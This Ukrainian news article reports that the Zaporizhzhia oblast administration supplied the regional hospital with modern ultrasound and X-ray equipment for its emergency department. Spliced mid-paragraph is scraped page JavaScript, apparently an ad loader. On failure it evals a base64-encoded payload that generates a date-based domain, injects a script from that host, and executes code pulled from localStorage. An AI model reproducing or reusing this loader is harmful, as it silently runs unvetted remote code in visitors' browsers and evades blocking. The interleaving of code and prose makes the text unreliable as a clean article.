Європейська діагностика в запорізьких умовах: адміністрація області передала ЗОКЛ надсучасне обладнання

Попри пандемію та обмежувальні заходи обласна влада, не збавляючи обертів, продовжує допомагати медзакладам області. Не стала виключенням і найбільша медустанова регіону – Запорізька обласна лікарня. Наразі тут продовжується глобальна реконструкція приймального відділення, куди будуть надходити «важкі» пацієнти, що потребують термінової діагностики та екстреної медичної допомоги.

– Коли рахунок іде на хвилини, правильно встановлений діагноз – головна умова для порятунку життя пацієнта. Тому обласна влада прийняла рішення забезпечити ЗОКЛ надсучасним діагностичним обладнанням європейського рівня – УЗД та рентген-апаратом, – повідомляє директор Департаменту охорони здоров’я ЗОДА Олексій Кулинич.

Новітнє обладнання дасть можливість проводити діагностику прямо у відділенні екстреної медичної допомоги, а при необхідності одразу починати лікування. Це допоможе швидше приймати життєво важливі рішення та надавати допомогу пацієнтам, чиє життя знаходиться в небезпеці.

Новітній УЗД-апарат протягом лише 10 хвилин дозволяє діагностувати причину загрозливого стану та, як наслідок, у стислі терміни приймати рішення про операцію, реанімаційні дії тощо.

Як зазначають спеціалісти, у західних країнах світу це обладнання використовують у машинах швидкої допомоги й санавіації. При життєво загрозливих станах воно дозволяє зробити експрес-скринінг і направити в спеціалізований госпіталь.

Не менш важливим діагностичним обладнанням, яке отримала Запорізька обллікарня, є система рентген-діагностики. Вона задовольняє будь-які потреби (від надзвичайних ситуацій до травматичних патологій) і дозволяє проводити як загальні рентгенологічні обстеження, так і дослідження грудної клітини й діагностику кістково-суглобової системи. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Апарат оснащений цифровою системою, яка забезпечує якісне зображення і максимально знижену дозу опромінення пацієнтів, а також дозволяє миттєво передавати інформацію вузьким спеціалістам. Це економить головний ресурс – час і дозволяє максимально швидко та якісно надавати пацієнту необхідну медичну допомогу.

Як зазначає заступниця голови ОДА Злата Некрасова, приймальні відділення нового формату – це не просто проєкти будівництва, а вихід на максимально якісний рівень надання екстреної медичної допомоги. Тому діагностичне обладнання також буде доставлено і в інші лікарні області, які в найближчому майбутньому відкриють приймальні відділення «нового формату», зокрема у Токмак, Мелітополь, Енергодар, Василівку та Пологи.

Своєю чергою, директор ЗОКЛ Ігор Шишка подякував представників облдержадміністрації за надану допомогу, яка сьогодні лікарні вкрай необхідна, і зауважив, що, об’єднавши зусилля, вже найближчим часом вдасться досягти спільної мети – зробити медичну допомогу максимально ефективною та доступною кожному мешканцю області.

Подписывайтесь на Акцент в

(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/yevropejska-diagnostika-v-zaporizkih-umovah-administratsiya-oblasti-peredala-zokl-nadsuchasne-obladnannya/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top